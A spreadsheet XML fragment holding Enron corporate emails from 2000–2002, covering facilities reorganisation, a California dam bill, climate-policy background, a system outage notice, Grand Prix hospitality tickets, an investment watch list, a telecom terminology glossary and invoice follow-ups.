    <t>Responsibility  for daily operations of building support services in the=20_x000D_
Enron Building, Houston leased offices, and Two Pacific Place (Omaha) will =_x000D_
be=20_x000D_
transitioning from Corporate to Enron Energy Services (EES) by year-end.  T=_x000D_
he=20_x000D_
areas affected include facility operations and maintenance of mechanical,=_x000D_
=20_x000D_
electrical, and air-conditioning systems; mail delivery;  housekeeping; =20_x000D_
food, copier, and records services._x000D_
_x000D_
This transition of services, as presently managed by Enron Property and=20_x000D_
Services Corp. (EPSC), is designed to optimize value to Enron=01,s Business=_x000D_
=20_x000D_
Units by leveraging facility management businesses now offered by EES to=20_x000D_
their commercial customers.  EPSC staff having administrative responsibilit=_x000D_
y=20_x000D_
for these services will report to Enron Facility Services, a subsidiary of=_x000D_
=20_x000D_
EES=01,s Global Energy Services group led by Daniel Leff, President and CEO=_x000D_
._x000D_
_x000D_
EPSC is responsible for Enron=01,s internal real estate and office developm=_x000D_
ent=20_x000D_
needs, including leasing, space allocations and facility planning, project=_x000D_
=20_x000D_
and construction management, furniture systems, and office relocation.  EPS=_x000D_
C,=20_x000D_
in its development role, remains a part of Enron Corporate Administration=_x000D_
=20_x000D_
Services (ECAS) along with Corporate Security and the Aviation Department,=_x000D_
=20_x000D_
reporting to Bill Donovan, Vice President, Corporate Administrative Service=_x000D_
s._x000D_
_x000D_
This alignment of responsibilities offers the opportunity for EPSC to focus=_x000D_
=20_x000D_
resources on effective utilization of our existing office space assets and=_x000D_
=20_x000D_
managing the development of Houston=01,s new Enron Center Campus project.</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 01:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hgovenar@govadv.com', 'mona_l_petrochko@enron.com', 'smccubbi@ees.enron.com', 'pkaufma@ect.enron.com', 'mday@gmssr.com', 'bgaillar@ees.enron.com', 'smara@enron.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>SB 1540</t>
  </si>
  <si>
    <t>Listed below is a brief description of SB 1540 (Sher) relating to dams._x000D_
We should keep an eye on this throughout the session._x000D_
_x000D_
_x000D_
The bill would enact the California Dam Decommission, River Restoration,_x000D_
and Public Safety Act of 2000, which would require the Secretary of_x000D_
Resources, on or before January 1, 2002, to prepare and submit to the_x000D_
Governor and the Legislature a report evaluating the suitability or_x000D_
nonsuitability for decommission, demolition, removal, or modification of_x000D_
dams, diversions, and other impoundment facilities for the purpose of_x000D_
restoring spawning habitat for salmon and steelhead fisheries within the_x000D_
system and within other rivers and streams in California._x000D_
_x000D_
http://info.sen.ca.gov/cgi-bin/postquery?bill_number=sb_1540&amp;sess=CUR&amp;house=B&amp;_x000D_
site=sen</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 12:25:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.jacobson@enron.com'})</t>
  </si>
  <si>
    <t>RE: GHG and CO2</t>
  </si>
  <si>
    <t>Dear Trevor and Michael,_x000D_
_x000D_
Attached please find a regulatory background document on global climate change and greenhouse gas emissions.  I have also included a short slide presentation summarizing the Kyoto Protocol.  Finally, I have attached two charts on greenhouse gas emissions trading programs: 1) government-run and 2) key voluntary programs and initiatives.  I will start working on a state chart next week._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
-Lisa_x000D_
_x000D_
 _x000D_
_x000D_
    _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Taylor, Michael E  _x000D_
Sent:	Thursday, October 11, 2001 11:47 AM_x000D_
To:	Jacobson, Lisa_x000D_
Subject:	GHG and CO2_x000D_
_x000D_
Lisa,_x000D_
_x000D_
Do you have a summary of GHG and/or CO2 program or possible programs as it pertains to the US? _x000D_
Also, is there a nice summary of the Kyoto Protocol as it stands?_x000D_
_x000D_
I know you have sent me numerous e-mails, already.  Thanks._x000D_
_x000D_
Michael Taylor_x000D_
Coal and Emissions Trading_x000D_
Enron Global Markets_x000D_
(713) 853-1885</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 01:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'isc.hotline@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'enron.users@enron.com', 'isc.groups@enron.com', 'enron.list@enron.com'})</t>
  </si>
  <si>
    <t>SAP SYSTEM OUTAGE NOTIFICATIONS</t>
  </si>
  <si>
    <t xml:space="preserve">The following server will be coming down, please see below for more details _x000D_
and scheduled times :_x000D_
_x000D_
_x000D_
-------------------------------------------------------------_x000D_
_x000D_
          SYSTEM OUTAGE NOTIFICATION      _x000D_
_x000D_
-------------------------------------------------------------_x000D_
_x000D_
FOR:  PR2 - HR Production_x000D_
_x000D_
_x000D_
Outage Start: (CST) 4/8/2001 at 09:00:00 AM_x000D_
_x000D_
Outage End: (CST) 4/8/2001 at 03:00:00 PM_x000D_
_x000D_
Outage Abstract:  System Maintenance_x000D_
_x000D_
Outage Description: Replace faulty hard-drive_x000D_
_x000D_
Outage Implication: System will be down for duration of outage_x000D_
_x000D_
Contact Name:Larry Harbuck   #:  1-877-498-3378_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Aug 2001 15:52:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mlaughlin@btaoil.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 Mary,_x000D_
_x000D_
Attached is a draft of a Spot Agreement for your consideration.  Please_x000D_
give me a call with any questions and or issues you may have regarding_x000D_
the attached._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Regards,_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 19:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Applied Finance - May 31-June 1, 2001 _x000D_
in EB552   Cost:  $700.00_x000D_
_x000D_
The objective of this program is not to teach you how to do a deal, but _x000D_
rather, to give you a better understanding of how basic financial principals _x000D_
contribute to the structure of a deal.    It will also provide you with _x000D_
insight to Enron deals in order that you can make a contribution to the work _x000D_
that goes into putting one together._x000D_
_x000D_
When you leave the program, you will have:_x000D_
_x000D_
R An understanding of basic financial and accounting issues relevant to _x000D_
Enron's transactions._x000D_
R A basic understanding of how Enron structures deals - the "deal space" and _x000D_
how the financial principals discussed  relate to  Enron deals._x000D_
R The ability to take the financial principals and apply them to an Enron _x000D_
deal._x000D_
_x000D_
_x000D_
Please login and enroll through the InvestInMe website, _x000D_
http://www.corptraining.com/index.cfm?company=enron.  If you have any _x000D_
questions, please call 713 853-0357.</t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 23:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({"virginia.o'neill@enron.com", 'amelia.alder@enron.com', 'kathy.campos@enron.com', 'michael.moran@enron.com', 'steve.hotte@enron.com', 'stanley.horton@enron.com', 'rita.houser@enron.com', 'james.prentice@enron.com', 'julia.white@enron.com', 'shelley.corman@enron.com', 'julie.armstrong@enron.com', 'phil.lowry@enron.com', 'anne.jolibois@enron.com', 'rod.hayslett@enron.com', 'ricki.winters@enron.com', 'rockford.meyer@enron.com', 'danny.mccarty@enron.com', 'cindy.stark@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>New location and phone #</t>
  </si>
  <si>
    <t>My new office location is EB1134 and office phone number is (713) 345-4478.  _x000D_
Carolyn Perry, Executive Secretary, will join me today (Monday) and her _x000D_
location is EB1132.  Carolyn's new phone number and our fax machine number _x000D_
will be established on Monday and communicated at that time.</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 08:59:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Texaco Grand Prix (October 5-7, 2001)</t>
  </si>
  <si>
    <t xml:space="preserve">no_x000D_
_x000D_
-----Original Message-----_x000D_
From: Heathman, Karen K. _x000D_
Sent: Wednesday, September 19, 2001 10:57 AM_x000D_
To: Buy, Rick_x000D_
Subject: FW: Texaco Grand Prix (October 5-7, 2001)_x000D_
_x000D_
_x000D_
Rick, Do you want to get any of these tickets for the Grand Prix?   Karen_x000D_
_x000D_
-----Original Message----- _x000D_
From: Tagliarino, David _x000D_
Sent: Tue 9/18/2001 6:58 PM _x000D_
To: Blackwood, Connie; Bolen, Vivianna; Burns, Jennifer; Chapman, Kay; Dauterive, Inez; Daw, Nicki; Elbertson, Janette; Fleming, Rosalee; Ford, Sue; Grow, Christina; Harris, Stephanie J; Heathman, Karen K.; Hillis, Kimberly; Maronge, Bridget; Marshall, Lucy; McVicker, Maureen; Phillips, Cathy; Rapacioli, Marisa; Schiller, Marsha; Schoppe, Tammie; Stark, Cindy; Westbrook, Sharron _x000D_
Cc: Grissom, Greg _x000D_
Subject: Texaco Grand Prix (October 5-7, 2001)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron Corporate Marketing, in conjunction with management from our core businesses, has entered into an agreement with the PacWest Racing Team for the 2001 Texaco/Havoline Grand Prix of Houston October 5-7, 2001.  The PacWest Racing Team is a member of the CART FedEx Championship Series, which features drivers Scott Dixon and Mauricio Gugelmin, and is owned by the McCaw Family (Nextel/McCaw Cellular).  Enron will be featured as a lead sponsor of the Scott Dixon #18 car, while receiving a number of other significant benefits, including:_x000D_
_x000D_
New business opportunities/lead generation _x000D_
Client, customer and executive entertainment &amp; hospitality (see below) _x000D_
Community programs/initiatives _x000D_
Employee programs, contests and special offers _x000D_
Global marketing &amp; branding benefits _x000D_
_x000D_
_x000D_
The agreement will enable Enron Executives the opportunity to entertain key customers with a one-of-a-kind "behind the scenes" experience that will include the following:_x000D_
_x000D_
Gourmet hospitality including breakfast and lunch prepared for Enron guests by an on-site chef at the race track in PacWest/Enron Summit mobile hospitality suites _x000D_
Paddock passes and guided tours allowing Enron guests to visit the garage areas to get a "behind the scenes" look at the business and technology of motor sports _x000D_
Saturday and Sunday race tickets located in Grandstand C, just before turn one and adjacent to our hospitality suite _x000D_
Driver autographs and "meet and greet" sessions for Enron customers and executives _x000D_
Opportunity to network with companies including (but not limited to): NEXTEL, JP Morgan Chase, Gemstar, Pennzoil, PPG, Snap-On, Bosch, Freightliner, Toyota, Panasonic, 3D Village _x000D_
_x000D_
_x000D_
This package is available for the weekend on a per day basis.  Enron has available 100 passes per day, and pricing is as follows:_x000D_
_x000D_
Saturday Only                   $150 per person _x000D_
Sunday Only                     $250 per person _x000D_
_x000D_
_x000D_
Please see the following attachments, as they will provide you the first look at the Enron/PacWest Racing car and the schedule of events.  Please contact David Tagliarino (853-7883) or Greg Grissom (345-8741) by Friday, September 28 to secure your package for this exciting weekend.   _x000D_
_x000D_
Thank you. _x000D_
_x000D_
                Enron / Scott Dixon #18 Race Car                Texaco/Havoline Grand Prix Schedule of Events _x000D_
                        &lt;&lt;enroncar.jpg&gt;&gt;                                       &lt;&lt;TGP 2001 Race Schedule.xls&gt;&gt;                                         _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 15:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rockey.storie@enron.com', 'yuan.tian@enron.com', 'michael.ratner@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'robert.hayes@enron.com'})</t>
  </si>
  <si>
    <t>Additional Background on Dale Nesbitt meeting</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
   _x000D_
	  From:  John Goodpasture                           11/03/2000 08:15 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Bill Cordes/NPNG/Enron@ENRON, Danny McCarty/LON/ECT@ECT, Michael Moran/ET&amp;S/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON, Robert Hill/NPNG/Enron@ENRON, Dave Neubauer/ET&amp;S/Enron@ENRON, Mike McGowan/ET&amp;S/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Re: Dale Nesbitt meeting   _x000D_
_x000D_
In case you were not quite certain of who Dale Nesbitt is, here is the skinny.  Sorry for my oversight.  _x000D_
_x000D_
Dale Nesbitt is the founder and President of Altos Management Partners.  Altos is a consulting and systems development firm that has visited Enron's offices on a couple of occasions to show us a computer model of the North American Natural Gas grid.  This was in conjunction with the Revenue Management project that Kim Watson headed up, but my group was also very interested in developing a more sophisticated (hopefully) analysis of pipeline flows, basis differentials, regional supply/demand, etc. for development of our short/long term strategies.  _x000D_
_x000D_
This model would accept a wide array of input data such as gas price curves, oil price curves, production potential of the major basins, regional market demand, pipeline tariffs, pipeline capacity limits, etc.  In theory, we could then have a more reasoned view of which pipelines would be either "winners" or "losers", which expansions would most likely be built, and what basis would exist at all pertinent trading points.  I understand that Enron already has a similar model for the electric generating/transmission grid in North America, and it has proven quite valuable._x000D_
_x000D_
In addition to the Altos model, we also looked at a model that had been developed by ICF Consulting.  Both companies made very impressive presentations and had obviously spent a great deal of time developing their work.  Vince Kaminski's research group has been involved in the evaluation of these two working models.  For comparison, Vince has also considered whether Enron should develop our own proprietary model in-house.  _x000D_
_x000D_
Vince now believes that the most cost effective way to get to final working model that we have confidence in, is to start with the Altos model and work with them to add/modify certain features.  The meeting with Dale Nesbitt is to explore this possibility.  I think it would be good to have another ETS representative (other than me) and possibly someone from NBP present at the meeting.  Both Margaret Carson and Vince Kaminski will attend.    _x000D_
_x000D_
JNG_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 06:48:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'l..carson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'david.gorte@enron.com', 'kevin.garland@enron.com', 'rick.buy@enron.com', 'barbara.paige@enron.com', 'chris.gray@enron.com', 'richard.lydecker@enron.com', 'm..melman@enron.com'})</t>
  </si>
  <si>
    <t>RE: EPI Watch List</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin:  It is understood and appreciated that EPI keeps all of their portfolio investments under close "watch".  The purpose of the report is more to provide management (some of them outside of EPI) an update on investments experiencing issues.  Additionally, the classifications "Watch", "Troubled", and "Loss"  form the basis of a merchant investment portfolio report that Rick Buy provides to the Finance Committee at each Board meeting.  The Watch report provides RAC an opportunity to get EPI's input for that process. _x000D_
 _x000D_
All that being said, we are certainly open to changes that help us better accomplish these objectives.  I am ready to discuss at your convenience.   Regards!     Rick C._x000D_
_x000D_
-----Original Message-----_x000D_
From: Garland, Kevin _x000D_
Sent: Thursday, October 11, 2001 10:36 PM_x000D_
To: Gray, Chris; Buy, Rick; Carson, Rick L.; Gorte, David; Lydecker Jr., Richard; Melman, Gil M.; Paige, Barbara_x000D_
Subject: RE: EPI Watch List_x000D_
_x000D_
_x000D_
For future reference, please note that all of our investments are "on watch" all of the time.  Any concept to the contrary seems absurd.  _x000D_
 _x000D_
Thanks,_x000D_
KG_x000D_
 _x000D_
_x000D_
-----Original Message----- _x000D_
From: Gray, Chris _x000D_
Sent: Wed 10/10/2001 4:54 PM _x000D_
To: Buy, Rick; Carson, Rick L.; Garland, Kevin; Gorte, David; Lydecker Jr., Richard; Melman, Gil M.; Paige, Barbara _x000D_
Cc: _x000D_
Subject: EPI Watch List_x000D_
_x000D_
_x000D_
_x000D_
Please see the attached EPI Watch List.  If you have any questions, please contact Rick Carson at 3-3905 or Lynn Bellinghausen at 5-7346._x000D_
_x000D_
&lt;&lt;EPI Final Watch Report 9-30-01.pdf&gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'apacheco@oneok.com'})</t>
  </si>
  <si>
    <t>TW Transportation Contract #25374</t>
  </si>
  <si>
    <t xml:space="preserve">Michelle,_x000D_
Please ammend contract # 25374 to include the month of February 2001._x000D_
Thanks,_x000D_
Andrew Pacheco_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 11:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'margo.reyna@enron.com', 'susan.landwehr@enron.com'})</t>
  </si>
  <si>
    <t>Re: My list of concepts/terms</t>
  </si>
  <si>
    <t xml:space="preserve">All,_x000D_
_x000D_
The list of concepts/terms  proposed by Sue and Margo are very useful and I _x000D_
have attempted to answer some of them,  unfortunately, quite few of the terms _x000D_
are complicated and may need further explanation. Please feel free to add or _x000D_
improve upon my answers._x000D_
_x000D_
1.  Legacy is anything that has been existence for a long time and handed _x000D_
down from previous generations.  In the world of telecom, there are many _x000D_
different legacies,  including legacy application, legacy card, legacy data, _x000D_
legacy LAN and legacy equipment  There is no precise category of legacy _x000D_
items, in short, legacy is anything that is outdated but too expensive to _x000D_
replace.  See 3) for an example._x000D_
_x000D_
2.  Enterprise are companies, or retail customers.  Contrast with wholesale _x000D_
customers, which are mainly capacity carriers like Level 3, Global Crossing, _x000D_
RBOCS, IXCS, etc._x000D_
 _x000D_
3.  I am not sure what is meant by recommended standard.  Single-mode fiber _x000D_
(SMF) is an optical fiber with diameter of  7 to 9 microns (about 1/3000th of _x000D_
an inch), used for high speed transmission over long distances.  It provides _x000D_
greater bandwidth and lower dispersion than multi-mode fiber(diameter of  50 _x000D_
to100 microns).  The next generation of SMF are high-speed data optimized _x000D_
fibers like Corning's LEAF and Lucent's TrueWave.  These new fibers have _x000D_
wider core and better dispersion/attenuation characteristics to allow more _x000D_
traffic to travel over longer distances with out having to be amplified.  The _x000D_
fiber core is the part of the fiber that actually carries the light signal _x000D_
transmission.  Existing fiber networks of incumbents such as AT&amp;T, MCI _x000D_
Worldcom and Sprint are largely made up of the older SMF (legacy fibers) _x000D_
while the new bandwidth barons such as Level 3, Global Crossing. Qwest and _x000D_
EBS have deployed the latest SMF. _x000D_
_x000D_
4.  IRU-  Indefeasible Right of Use is a term used in the underseas cable and _x000D_
fiber optic business.  An IRU is mainly composed of the following elements_x000D_
_x000D_
a) Basis of offer -- transfer of asset ownership of fiber to the buyer. In _x000D_
some respects, IRUs is similar to real estate acquisition, in which ownership _x000D_
of a physical entity passes from seller to buyer by the execution of a _x000D_
contract.  _x000D_
_x000D_
b) Ownership period -- usually for the planned life of a cable and is _x000D_
determined by the seller.  _x000D_
Typically, a cable life span would be 15, 20 or 25 years.  However, cable _x000D_
life cycles will probably shorten in the near future due to the more rapid _x000D_
pace of the innovation in fiber and photonic engineering._x000D_
_x000D_
c) Deposits_x000D_
It is usual for a non-refundable deposit to be requested by the seller at the _x000D_
time of executing contracts, in most cases this is 10% of the purchase price._x000D_
_x000D_
d) O&amp;M costs_x000D_
O&amp;M charges are normally a recurring annual charge payable to the seller (or _x000D_
third party O&amp;M contractor) to cover both costs of daily and emergency _x000D_
maintenance.  The charges are usually escalated to inflation and to the _x000D_
additional costs associated with cable aging._x000D_
_x000D_
5.  The information transmitted along the various capacities are 1s and 0s, _x000D_
the digitalized equivalent of voice, data or video.  It is common to express _x000D_
the capacity of a digital transmission medium by the speed or rate at which _x000D_
it is able to transmit digital information. A single voice transmission _x000D_
normally operates at 64 kb/s, a T-1 or a DS-0, the consequent digital signals _x000D_
are all based on the number of DS-0 channels.  DS standards was developed in _x000D_
North American  and is mainly used for copper lines.  A fiber optics became _x000D_
mainstream, SONET (Synchronous Optical Network)  was adopted as a  standard _x000D_
for connecting fiber-optic transmission systems_x000D_
_x000D_
6. SONET is the lowest level of the OSI protocol model-- the physical layer, _x000D_
it is a method of providing a roadway, or path that can be used by a variety _x000D_
of traffic sources and protocols. In many ways, SONET is completely neutral _x000D_
to the content or higher level protocols in the traffic stream itself.  Basic _x000D_
foundation of SONET consist of DS-0 signal that are multiplexed to create _x000D_
51.84 kbps, known as STS-1 (Synchronous transport signal), STS-1 is an _x000D_
electrical signal rate that corresponds to optical carrier line rate of OC-1 _x000D_
(building blocks).   With the older DS systems, signals can't jump from DS-1 _x000D_
to DS-3, instead a 2 steps process must be taken, which involves adding _x000D_
overhead to the transmission.  With Sonet, higher capacities can be created _x000D_
by interleaving STS-1 signals to create a concatenated, or linked, signal. _x000D_
For example, three STS-1 frames can form an STS-3 frame (155Mbits/sec). Rates _x000D_
above STS-3 can be created by either directly multiplexing STS-1 signals or _x000D_
by byte-interleaving STS-3 signals. SONET can also handle signals below _x000D_
51Mbits/sec. A structure called VT (virtual tributary) accommodates DS-1, _x000D_
DS-2 and E1 (European equivalent of T1 at 2 Mbit/s)_x000D_
_x000D_
7. ATM is Short for Asynchronous Transfer Mode, a network technology based on _x000D_
transferring data in cells or packets of a fixed size. The cell used with ATM _x000D_
is relatively small compared to units used with older technologies. ATM _x000D_
creates a fixed channel, or route, between two points whenever data transfer _x000D_
begins. This differs from TCP/IP, in which messages are divided into packets _x000D_
and each packet can take a different route from source to destination. This _x000D_
difference makes it easier to track and bill data usage across an ATM _x000D_
network, but it makes it less adaptable to sudden surges in network _x000D_
traffic.   ATM is designed specifically to operates with  SONET as the _x000D_
transport.  While new entrants such as Level 3 built its network based on _x000D_
pure IP technology, it is still using ATM to link up its core locations.  The _x000D_
trouble with IP currently is the QoS and delay issues. In the future, _x000D_
however, with advanced protocols such as MPLS, routers are expected to _x000D_
eliminate ATM in the network.  MPLS is an extension of IP and it provides QoS _x000D_
similar to ATM.   For new entrants, the long term goal is to replace the _x000D_
legacy system  (SONET and ATM) with IP over DWDM, which is more efficient and _x000D_
lower cost transport. _x000D_
_x000D_
8. SDH is European equivalent of SONET_x000D_
_x000D_
9. bi-directional line switched ring (BLSR)- SONET operates in several _x000D_
different modes. A major distinction in operation is whether the service is _x000D_
deployed in a linear fashion or as one of several ring types.  There are two _x000D_
types of SONET ring. One switches individual paths (path switched) and the _x000D_
other switches the entire optical line capacity (line switched).  A key _x000D_
difference is the number of fibers used. Path switched rings use only two _x000D_
fibers while line switching can use either two or four fibers. Four fiber _x000D_
bi-directional line switching sends traffic only in the required direction _x000D_
during normal operation. Each direction has a working fiber and a protect _x000D_
fiber in each direction. During a fiber interruption, the traffic is routed _x000D_
around the break in the opposite direction, hence the name bi-directional._x000D_
 _x000D_
10. Throughput capacity is the actual amount of useful information which is _x000D_
transmitted.  It is used to measure the efficiency of a network._x000D_
11. Long haul - means long distance, long haul implies traversing states or _x000D_
countries, as oppose to short haul._x000D_
12.  10% rule -  A accounting rule in a case in which 10% of the traffic is _x000D_
intrastate, and the other 90% interstate, then the traffic is deemed to be _x000D_
interstate._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Susan M Landwehr@ENRON_x000D_
	12/27/00 02:59 PM_x000D_
		_x000D_
		 To: Margo Reyna/NA/Enron@Enron_x000D_
		 cc: Barbara A Hueter/NA/Enron@Enron, Donald Lassere/Enron _x000D_
Communications@Enron Communications, Jeff Dasovich/NA/Enron@Enron, Lara _x000D_
Leibman/Enron Communications@Enron Communications, Marchris _x000D_
Robinson/NA/Enron@Enron, Mona L Petrochko/NA/Enron@Enron, Ricardo _x000D_
Charvel/NA/Enron@Enron, Scott Bolton/Enron Communications@Enron _x000D_
Communications, Stephen D Burns/Corp/Enron@ENRON, Sue Nord/NA/Enron@Enron, _x000D_
Susan M Landwehr/NA/Enron@Enron, Tracy Cooper/Enron Communications@Enron _x000D_
Communications, Xi Xi/Enron Communications@Enron Communications_x000D_
		 Subject: Re: My list of concepts/terms_x000D_
_x000D_
I'll add two to the list:_x000D_
_x000D_
1  Why is the term "Legacy" often used and does it mean something other than _x000D_
"old way of doing things"_x000D_
_x000D_
_x000D_
2.  Why is a business customer called an "Enterprise" customer?  Does it have _x000D_
something to do with the size of the customer?  The type of customer?  Or is _x000D_
it just a fancy name for a customer._x000D_
_x000D_
_x000D_
_x000D_
	Margo Reyna_x000D_
	12/19/2000 10:37 AM_x000D_
		 _x000D_
		 To: Sue Nord/NA/Enron@Enron, Scott Bolton/Enron Communications@Enron _x000D_
Communications, Tracy Cooper/Enron Communications@Enron Communications, Lara _x000D_
Leibman/Enron Communications@Enron Communications, Donald Lassere/Enron _x000D_
Communications@Enron Communications, Mona L Petrochko/NA/Enron@Enron, Barbara _x000D_
A Hueter/NA/Enron@Enron, Jeff Dasovich/NA/Enron@Enron, Susan M _x000D_
Landwehr/NA/Enron@Enron, Marchris Robinson/NA/Enron@Enron, Ricardo _x000D_
Charvel/NA/Enron@Enron, Stephen D Burns/Corp/Enron@ENRON, Xi Xi/Enron _x000D_
Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: My list of concepts/terms_x000D_
_x000D_
Here's my list of some things that I would like to learn more about:_x000D_
_x000D_
1.  The difference between recommended standard (RS) and single-mode fiber _x000D_
(SMF) cable?_x000D_
_x000D_
2.  What is an indefeasible right of use (IRU)?  It is like a right-of-way?_x000D_
_x000D_
3.  What are the differences in the various capacities of cable (DS-3, _x000D_
OC-192, etc.).  Not just the amount of capacity each has, but what types of _x000D_
information are transmitted along each._x000D_
_x000D_
4.  What is a synchronous optical network (SONET)?_x000D_
_x000D_
5.  What is asynchronous transfer mode (ATM)? _x000D_
_x000D_
6.  What is synchronous digital hierarchy (SDH)?  I think this is used in _x000D_
Europe, but I'm not sure._x000D_
_x000D_
7.  What is a bi-directional line switched ring (BLSR)?_x000D_
_x000D_
8.  What is throughput capacity?_x000D_
_x000D_
9.  What does the term "long haul" mean?_x000D_
_x000D_
10.  I still don't have a grasp of the 10% rule.  Unfortunately, I think I _x000D_
need this one spelled out in the most basic terms._x000D_
_x000D_
I have many more questions, but I think this is a good start._x000D_
_x000D_
Thanks._x000D_
_x000D_
Margo Reyna_x000D_
Regulatory Analyst_x000D_
Enron Corp., Government Affairs_x000D_
Phone:  713-853-9191_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 02:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.veselack@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>Titanium Metals capacity</t>
  </si>
  <si>
    <t xml:space="preserve">Do you guys know which contract this is? _x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 04/26/2000 09:58 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Colleen Sullivan                           04/25/2000 08:24 AM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Mark Breese/HOU/ECT@ECT, Steve Jackson/HOU/ECT@ECT, Dan Junek/HOU/ECT@ECT _x000D_
Subject: Titanium Metals capacity_x000D_
_x000D_
Chris--see Melissa's note below.....per her note it would appear that part of _x000D_
the capacity we valued in the Wholesale book (not Retail) was not really _x000D_
capacity they owned.  Can you give me the details on this capacity--what term _x000D_
they gave it to us for, rate, receipt and delivery points, volume, etc.  Then _x000D_
we need to look at what impact it will have to take it out of the book.  _x000D_
Thanks for the help._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Colleen Sullivan/HOU/ECT on 04/25/2000 _x000D_
08:21 AM ---------------------------_x000D_
_x000D_
_x000D_
mflewellyn@columbiaenergygroup.com on 04/24/2000 03:46:16 PM_x000D_
To: " - *colleen.sullivan@enron.com" &lt;colleen.sullivan@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Titanium Metals capacity_x000D_
_x000D_
_x000D_
Colleen,_x000D_
_x000D_
As I understand it, we were acting as Agent for TCO capacity owned by Titanium_x000D_
Metals, and that capacity was incorrectly incorporated into the sale of our_x000D_
Wholesale book.  Could you please look into this on your end and let me know_x000D_
how to best proceed with correcting this situation._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Melissa (703-561-6408)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 07:55:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Wood Report Oct. 01 thru Oct. 15</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Monte  _x000D_
Sent:	Tuesday, October 16, 2001 6:33 AM_x000D_
To:	Allen, Phillip K.; Ermis, Frank; Gay, Randall L.; Grigsby, Mike; Heu, Mog; Holst, Keith; Kuykendall, Tori; Lenhart, Matthew; Reitmeyer, Jay; Smith, Matt; Wolfe, Jason_x000D_
Cc:	Bike, Anne_x000D_
Subject:	Wood Report Oct. 01 thru Oct. 15_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 18 Mar 2002 07:55:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lynn.blair@enron.com', 'rick.dietz@enron.com', 'bert.hernandez@enron.com', 'richard.hanagriff@enron.com', 'tracy.minter@enron.com', 'amy.mulligan@enron.com', 'linda.ward@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'christine.mcevoy@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>RE: Febinvoices not paid</t>
  </si>
  <si>
    <t xml:space="preserve">Can each Customer Service Rep. please contact each customer that has not paid and provide a status of the payment due TW._x000D_
_x000D_
Thanks: John Buchanan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hanagriff, Richard  _x000D_
Sent:	Monday, March 18, 2002 9:52 AM_x000D_
To:	Buchanan, John; Mulligan, Amy; Ward, Linda; McEvoy, Christine; Minter, Tracy; Hernandez, Bert; McConnell, Mark; Lokay, Michelle; Watson, Kimberly; Y'barbo, Paul; Blair, Lynn; Dietz, Rick_x000D_
Subject:	Febinvoices not paid_x000D_
_x000D_
 &lt;&lt; File: invoicesFeb02.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 07:48:00 -0800 (PST)</t>
